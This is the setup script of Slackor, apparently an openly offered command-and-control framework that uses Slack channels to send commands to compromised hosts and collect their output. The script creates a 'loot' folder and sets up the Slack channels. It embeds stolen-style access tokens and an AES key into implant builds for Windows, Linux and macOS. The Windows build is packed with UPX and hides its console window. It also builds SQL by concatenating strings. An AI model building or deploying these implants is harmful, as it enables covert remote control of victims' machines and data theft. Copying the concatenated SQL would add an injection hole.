github.com/n00py/Slackor@v0.0.0-20200610224921-d007fcea1740/setup.py (about) 1 import hashlib 2 import json 3 import os 4 import random 5 import requests 6 import sqlite3 7 import subprocess 8 import sys 9 10 # Initialize variables 11 commands = None 12 responses = None 13 registration = None 14 15 # Create directories 16 if not os.path.exists("loot"): 17 os.mkdir("loot") 18 if not os.path.exists("output"): 19 os.mkdir("output") 20 21 print("First you must also create a Slack bot.\n" 22 "Ensure your Slack app has these permissions before you continue:\nBot:\n" 23 "\nchannels:history\nchannels:read\nchannels:write \nchat:write:\nusers:read\n" 24 "User:\nchannels:history\nchannels:write\nfiles:read\nfiles:write") 25 token = input("Enter the OAuth Access Token: ") 26 bearer = input("Enter the Bot User OAuth Access Token: ") 27 28 print("OAuth Access Token: " + token) 29 print("Bot User OAuth Access Token: " + bearer) 30 31 print("Attempting to create Slack channels...") 32 33 # Check if channels exist 34 headers = {'Authorization': 'Bearer ' + bearer} 35 data = {"token": token, "name": "commands", "validate": "True"} 36 r = requests.get('https://slack.com/api/channels.list', headers=headers) 37 result = json.loads(r.text) 38 for channel in result["channels"]: 39 if channel["name"] == "commands": 40 commands = channel["id"] 41 print("Existing commands channel found") 42 if channel["name"] == "registration": 43 registration = channel["id"] 44 print("Existing registration channel found") 45 if channel["name"] == "responses": 46 responses = channel["id"] 47 print("Existing response channel found") 48 49 # Create channels 50 headers = {'Authorization': 'Bearer ' + bearer} 51 if commands is None: 52 data = {"token": token, "name": "commands", "validate": "True"} 53 r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data) 54 result = json.loads(r.text) 55 try: 56 commands = result["channel"]["id"] 57 print("Commands channel: " + commands) 58 except KeyError: 59 print(result) 60 print("Commands channel already exists, log into Slack and delete it manually") 61 print("Go to: Channel Settings -> Additional Options - > Delete this Channel") 62 sys.exit() 63 64 if responses is None: 65 data = {"token": token, "name": "responses"} 66 r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data) 67 result = json.loads(r.text) 68 try: 69 responses = result["channel"]["id"] 70 print("Responses channel: " + responses) 71 except KeyError: 72 print("Responses channel already exists, log into Slack and delete it manually") 73 print("Go to: Channel Settings -> Additional Options - > Delete this Channel") 74 sys.exit() 75 76 if registration is None: 77 data = {"token": token, "name": "registration"} 78 r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data) 79 result = json.loads(r.text) 80 try: 81 registration = result["channel"]["id"] 82 print("Registration channel: " + registration) 83 except KeyError: 84 print("Registration channel already exists, log into Slack and delete it manually") 85 print("Go to: Channel Settings -> Additional Options - > Delete this Channel") 86 sys.exit() 87 88 # Invite bot user to created channels 89 data = {"token": token} 90 r = requests.get('https://slack.com/api/users.list', headers=headers) 91 result = json.loads(r.text) 92 slackusers = [] 93 for user in result["members"]: 94 if user["is_bot"]: 95 slackusers.append(user["id"]) 96 for channel in [commands, responses, registration]: 97 data = {"token": token, "channel": channel, "users": ','.join(slackusers)} 98 r = requests.post('https://slack.com/api/conversations.invite', headers=headers, data=data) 99 print("Added bot account to channel " + channel) 100 101 # If a database already exists, remove it 102 try: 103 os.remove('slackor.db') 104 print("Deleting current database...") 105 except OSError: 106 pass 107 conn = sqlite3.connect('slackor.db') 108 print("Creating AES key...") 109 aes_key = ''.join(random.choice('0123456789ABCDEF') for n in range(32)) 110 print(aes_key) 111 print("Created new database file...") 112 print("Putting keys in the database...") 113 # Create table for keys 114 conn.execute('''CREATE TABLE KEYS 115 (ID TEXT PRIMARY KEY NOT NULL, 116 TOKEN TEXT NOT NULL, 117 BEARER TEXT NOT NULL, 118 AES TEXT NOT NULL);''') 119 conn.execute("INSERT INTO KEYS (ID,TOKEN,BEARER,AES) VALUES ('1', '" + token + "','" + bearer + "','" + aes_key + "')") 120 121 print("Adding slack channels to the database...") 122 123 # Create table for channels 124 conn.execute('''CREATE TABLE CHANNELS 125 (ID TEXT PRIMARY KEY NOT NULL, 126 COMMANDS TEXT NOT NULL, 127 RESPONSES TEXT NOT NULL, 128 REGISTRATION TEXT);''') 129 conn.execute("INSERT INTO CHANNELS (ID,COMMANDS,RESPONSES,REGISTRATION) VALUES ('1', '" + commands + "','" 130 + responses + "','" + registration + "')") 131 132 # Create table for holding agents 133 conn.execute('''CREATE TABLE AGENTS 134 (ID TEXT PRIMARY KEY NOT NULL, 135 HOSTNAME TEXT NOT NULL, 136 USER TEXT NOT NULL, 137 IP TEXT NOT NULL, 138 VERSION TEXT);''') 139 conn.commit() 140 conn.close() 141 print("Database created successfully") 142 143 # Build exe and pack with UPX 144 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=windows GOARCH=amd64 go build -o dist/agent.windows.exe -ldflags \"-s -w -H windowsgui -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 145 subprocess.run(["bash", "-c", "cp -p dist/agent.windows.exe dist/agent.upx.exe"]) 146 subprocess.run(["bash", "-c", "upx --force dist/agent.upx.exe"]) 147 148 # Build for linux and macOS 149 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=amd64 go build -o dist/agent.64.linux -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 150 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=386 go build -o dist/agent.32.linux -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 151 subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=darwin GOARCH=amd64 go build -o dist/agent.darwin -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))]) 152 153 # Print hashes 154 filenames = ["dist/agent.windows.exe", "dist/agent.upx.exe", "dist/agent.64.linux", "dist/agent.32.linux", "dist/agent.darwin"] 155 for filename in filenames: 156 # TODO: use buffers/hash update if the agent ever gets big 157 f = open(filename, 'rb').read() 158 h = hashlib.sha256(f).hexdigest() 159 print(h + " " + filename)